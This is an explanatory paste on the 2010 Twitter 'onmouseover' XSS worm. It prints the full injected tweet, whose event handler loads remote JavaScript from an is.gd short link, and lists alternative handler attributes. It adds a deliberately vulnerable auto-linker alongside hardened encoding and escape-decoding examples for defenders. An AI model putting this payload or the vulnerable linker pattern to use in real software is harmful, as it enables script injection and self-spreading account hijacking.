@anusoft / twitter worm

a guest, Sep 21st, 2010

How the Twitter "onmouseover" worm (and others like it ;) works.
The root cause of this bug is missing input sanitization; "XSS" only describes the effect, and "onmouseover" is just one of many attributes it can be used with.


Usually Twitter sanitizes user input such as <html> tags so that a tweet cannot change the page's display or behaviour.

When you put a URL in a tweet, Twitter turns it into a link for you (it wraps it in an <a href> tag).

But Twitter forgot to sanitize the part of the link after the @ symbol.

So when you tweet http://www.google.com/ Twitter shows it like this:
################################################
<a href="http://www.google.com/">
http://www.google.com/
</a>
################################################


But when you tweet this:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/

Twitter shows it like this:
################################################
<a href="http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/">
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
</a>
################################################

The double quote after the @ closes the href value, so the rest of the "URL" becomes new attributes of the <a> tag, and a normal-looking link becomes a very dangerous one.
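To make the mechanism concrete, here is an added example (it is not code from the original paste, and not Twitter's actual linker): a naive auto-linker in JavaScript that reproduces the vulnerable output shown above, next to a hardened version that entity-encodes on output and restricts which characters can be part of a URL. The function names (autolinkVulnerable, autolinkSafe, escapeHtml, countTagAttributes) and the exact regular expressions are my own assumptions about what such a linker looks like; the two tweets are copied from the text of this page.

```javascript
// Added example, not code from the original paste or from Twitter.
// Both tweets are taken from the text of this page.
const BENIGN_TWEET = 'http://www.google.com/';
// String.raw keeps the \u002f sequences as literal text, exactly as typed in the tweet.
const WORM_TWEET = String.raw`http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/`;

// VULNERABLE (assumed shape of the buggy linker): treat "anything up to
// whitespace" as the URL and paste it straight into an href attribute and
// into the text node. A double quote in the URL ends the href value early,
// so the rest of the URL is parsed as new attributes of the <a> tag.
function autolinkVulnerable(tweet) {
  return tweet.replace(/https?:\/\/\S+/g, url => `<a href="${url}">${url}</a>`);
}

// Entity-encode the five characters that can break out of an attribute value
// or a text node. Encoding on output is what actually stops the injection.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Defence in depth: only the characters RFC 3986 allows in a URL are part of
// the link. A double quote ends the match, so it can never reach the href.
const SAFE_URL_RE = /https?:\/\/[A-Za-z0-9\-._~:\/?#\[\]@!$&'()*+,;=%]+/g;

// HARDENED: restrict what counts as a URL and encode everything on output,
// both the link and the plain text around it.
function autolinkSafe(tweet) {
  let out = '';
  let last = 0;
  for (const m of tweet.matchAll(SAFE_URL_RE)) {
    out += escapeHtml(tweet.slice(last, m.index));
    const url = escapeHtml(m[0]);
    out += `<a href="${url}">${url}</a>`;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(tweet.slice(last));
}

// Count the attributes inside the first <a ...> tag a browser would see.
// The worm only works if something besides the single href survives.
function countTagAttributes(html) {
  const tag = html.match(/<a\b[^>]*>/);
  return tag ? (tag[0].match(/[a-z]+="/g) || []).length : 0;
}

console.log(autolinkVulnerable(WORM_TWEET)); // href, style and onmouseover all become attributes
console.log(autolinkSafe(WORM_TWEET));       // only href; the rest of the payload is inert text
```

Run it with node. For the worm tweet the vulnerable linker emits three attributes (href, style, onmouseover) inside the <a> tag; the hardened one emits only href, and the rest of the payload is displayed as harmless text. Encoding on output is the fix that matters; the stricter URL character class is defence in depth, because with it a double quote can never become part of the href in the first place.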

There are a lot of other things you could do with this, but I'll explain what this worm does.


************************************
style="font-size:999999999999px;"
************************************
This enlarges the font so the link covers a large area of the page, making it very easy for the user's mouse to pass over it (no click is needed).

************************************************************************
onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"
************************************************************************
This is the tricky part. twitter.com uses the jQuery JavaScript framework, which makes the attacker's life much easier:
jQuery's .getScript() function fetches an external JavaScript file from any URL and executes it, and $ is already defined on the page, so the whole payload fits in one short attribute.

\u002f is the JavaScript string escape for the / character. This is another trick to stop Twitter's sanitizer from recognising the URL and cleaning it out: the tweet text never contains "http://is.gd/...", but when the browser runs the handler the escapes are decoded and the string is the real URL.

So the real link to the script is:
http://is.gd/fl9A7


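As an added example (not the paste's own code), the following JavaScript decodes \uXXXX escapes the way the browser's string-literal parser does, and shows why a sanitizer that scans the raw tweet for URLs sees nothing while the decoded handler contains the real script URL. decodeJsEscapes, findUrls, findUrlsAfterDecoding and the URL regular expression are my own names and assumptions; the handler string is copied from the payload above.

```javascript
// Added example, not code from the original paste.
// The value of the injected onmouseover attribute, copied from the payload above
// (String.raw keeps the backslashes literal, as they are in the tweet text).
const HANDLER_SOURCE = String.raw`$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')`;

// Decode \uXXXX, \u{X...} and \xXX escapes the way a JS string literal does.
// Other escapes (\n, \', ...) are left alone; the worm does not use them.
function decodeJsEscapes(s) {
  return s.replace(
    /\\u\{([0-9a-fA-F]{1,6})\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})/g,
    (_, braced, u4, x2) => String.fromCodePoint(parseInt(braced || u4 || x2, 16)),
  );
}

// A simple "is there a URL in this string?" check, the kind a sanitizer or
// auto-linker might apply to the raw tweet. It stops at quotes and parentheses.
const URL_RE = /https?:\/\/[^\s'"()]+/g;
function findUrls(s) {
  return s.match(URL_RE) || [];
}

// Scanning the raw text finds no URL, because the slashes are spelled \u002f.
// Decoding first reveals http://is.gd/fl9A7, the script the browser will load.
function findUrlsAfterDecoding(s) {
  return findUrls(decodeJsEscapes(s));
}

console.log(findUrls(HANDLER_SOURCE));              // [] : the filter is blind
console.log(findUrlsAfterDecoding(HANDLER_SOURCE)); // [ 'http://is.gd/fl9A7' ]
```

The lesson for defenders is that a blocklist applied to the raw text is always one encoding away from being bypassed; encoding the output for the HTML context it lands in (as in the hardened linker earlier on this page) is what prevents the attribute from existing at all.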
JavaScript event-handler attributes that work on an <a> tag (any of them could replace onmouseover in the payload above):

onfocus, onblur, onclick, ondblclick, onmousedown, onmouseup, onmouseover, onmousemove, onmouseout, onkeypress, onkeydown, onkeyup

Information about the jQuery JavaScript framework:
jQuery http://docs.jquery.com/Main_Page


- @anusoft